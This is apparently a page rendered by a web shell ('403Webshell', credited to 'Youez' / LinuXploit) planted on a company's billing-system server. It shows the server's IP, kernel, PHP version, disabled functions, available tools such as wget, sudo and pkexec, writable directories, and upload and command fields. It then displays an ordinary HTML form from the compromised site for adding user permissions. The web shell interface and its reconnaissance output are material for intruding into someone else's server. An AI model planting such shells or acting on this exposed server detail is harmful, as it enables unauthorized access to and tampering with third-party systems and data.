403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/billingsystem/dashboard/component/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/billingsystem/dashboard/component/add_permission.php
<div class="modal fade bd-example-modal-lg" id="addNew" tabindex="-1" role="dialog" aria-labelledby="addNew" aria-disabled="true">
    <div class="modal-dialog modal-md modal-dialog-centered" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h3 class="modal-title">Add permission
                </h3>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-disabled="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <div class="card-body boxShadow whiteBg mb-3">
                    <div class="row">
                        <div class="col-md-12 d-flex justify-content-between">
                            <div class="row mb-4 w-100">
                                <div class="col-6 col-lg-3">
                                    <span class="bold"> Created At :</span><br> 30 Jan 2020 05:50:00
                                </div>
                                <div class="col-6 col-lg-3">
                                    <span class="bold"> Created By :</span><br> May Chan
                                </div>
                                <div class="col-6 col-lg-3">
                                    <span class="bold"> Last Update At :</span><br> 30 Jan 2020 05:50:00
                                </div>
                                <div class="col-6 col-lg-3">
                                    <span class="bold"> Last Update By :</span><br> May Chan
                                </div>
                            </div>

                        </div>
                        <div class="col-md-12">
                            <div class="form-group mb-4">
                                <label for="PermissionsName" class="require">Permissions Name</label>
                                <input type="text" class="form-control" id="PermissionsName" value="" placeholder="">
                            </div>
                        </div>


                    </div>





                    <div class="table-responsive collapse show" id="invoicesAwaitingTB">
                        <table class="table custom-table permissonTb small text-dark">
                            <thead>
                                <tr>
                                    <th>Permissions</th>
                                    <th>
                                        PERMISSIONS Select
                                    </th>


                                </tr>
                            </thead>
                            <tbody>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Customer
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CustomerAdmin1" value="View">
                                            <label class="form-check-label" for="CustomerAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CustomerAdmin2" value="Create">
                                            <label class="form-check-label" for="CustomerAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CustomerAdmin3" value="Edit">
                                            <label class="form-check-label" for="CustomerAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CustomerAdmin4" value="Delete">
                                            <label class="form-check-label" for="CustomerAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold">
                                        Product
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ProductAdmin1" value="View">
                                            <label class="form-check-label" for="ProductAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ProductAdmin2" value="Create">
                                            <label class="form-check-label" for="ProductAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ProductAdmin3" value="Edit">
                                            <label class="form-check-label" for="ProductAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ProductAdmin4" value="Delete">
                                            <label class="form-check-label" for="ProductAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Stores
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="StoresAdmin1" value="View">
                                            <label class="form-check-label" for="StoresAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="StoresAdmin2" value="Create">
                                            <label class="form-check-label" for="StoresAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="StoresAdmin3" value="Edit">
                                            <label class="form-check-label" for="StoresAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="StoresAdmin4" value="Delete">
                                            <label class="form-check-label" for="StoresAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Quotation
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="QuotationAdmin1" value="View">
                                            <label class="form-check-label" for="QuotationAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="QuotationAdmin2" value="Create">
                                            <label class="form-check-label" for="QuotationAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="QuotationAdmin3" value="Edit">
                                            <label class="form-check-label" for="QuotationAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="QuotationAdmin4" value="Delete">
                                            <label class="form-check-label" for="QuotationAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Invoice
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceAdmin1" value="View">
                                            <label class="form-check-label" for="InvoiceAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceAdmin2" value="Create">
                                            <label class="form-check-label" for="InvoiceAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceAdmin3" value="Edit">
                                            <label class="form-check-label" for="InvoiceAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceAdmin4" value="Delete">
                                            <label class="form-check-label" for="InvoiceAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Invoice Recurrent
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceRecurrentAdmin1" value="View">
                                            <label class="form-check-label" for="InvoiceRecurrentAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceRecurrentAdmin2" value="Create">
                                            <label class="form-check-label" for="InvoiceRecurrentAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceRecurrentAdmin3" value="Edit">
                                            <label class="form-check-label" for="InvoiceRecurrentAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InvoiceRecurrentAdmin4" value="Delete">
                                            <label class="form-check-label" for="InvoiceRecurrentAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Credit Note
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CreditNoteAdmin1" value="View">
                                            <label class="form-check-label" for="CreditNoteAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CreditNoteAdmin2" value="Create">
                                            <label class="form-check-label" for="CreditNoteAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CreditNoteAdmin3" value="Edit">
                                            <label class="form-check-label" for="CreditNoteAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="CreditNoteAdmin4" value="Delete">
                                            <label class="form-check-label" for="CreditNoteAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Receipt
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReceiptAdmin1" value="View">
                                            <label class="form-check-label" for="ReceiptAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReceiptAdmin2" value="Create">
                                            <label class="form-check-label" for="ReceiptAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReceiptAdmin3" value="Edit">
                                            <label class="form-check-label" for="ReceiptAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReceiptAdmin4" value="Delete">
                                            <label class="form-check-label" for="ReceiptAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Delivery note
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="DeliveryNoteAdmin1" value="View">
                                            <label class="form-check-label" for="DeliveryNoteAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="DeliveryNoteAdmin2" value="Create">
                                            <label class="form-check-label" for="DeliveryNoteAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="DeliveryNoteAdmin3" value="Edit">
                                            <label class="form-check-label" for="DeliveryNoteAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="DeliveryNoteAdmin4" value="Delete">
                                            <label class="form-check-label" for="DeliveryNoteAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Inventory
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InventoryAdmin1" value="View">
                                            <label class="form-check-label" for="InventoryAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InventoryAdmin2" value="Create">
                                            <label class="form-check-label" for="InventoryAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InventoryAdmin3" value="Edit">
                                            <label class="form-check-label" for="InventoryAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="InventoryAdmin4" value="Delete">
                                            <label class="form-check-label" for="InventoryAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Reporting
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReportingAdmin1" value="View">
                                            <label class="form-check-label" for="ReportingAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReportingAdmin2" value="Create">
                                            <label class="form-check-label" for="ReportingAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReportingAdmin3" value="Edit">
                                            <label class="form-check-label" for="ReportingAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="ReportingAdmin4" value="Delete">
                                            <label class="form-check-label" for="ReportingAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                                <tr>
                                    <td class="bg-gary-blue bold ">
                                        Payment Terms
                                    </td>
                                    <td class="admin">
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="PaymentTermsAdmin1" value="View">
                                            <label class="form-check-label" for="PaymentTermsAdmin1">View</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="PaymentTermsAdmin2" value="Create">
                                            <label class="form-check-label" for="PaymentTermsAdmin2">Create</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="PaymentTermsAdmin3" value="Edit">
                                            <label class="form-check-label" for="PaymentTermsAdmin3">Edit</label>
                                        </div>
                                        <div class="form-check form-check-inline">
                                            <input class="form-check-input" type="checkbox" id="PaymentTermsAdmin4" value="Delete">
                                            <label class="form-check-label" for="PaymentTermsAdmin4">Delete</label>
                                        </div>
                                    </td>

                                </tr>
                            </tbody>
                        </table>
                    </div>


                </div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <button type="button" class="btn btn-primary saveDate shadow_blue">Create</button>
            </div>
        </div>
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit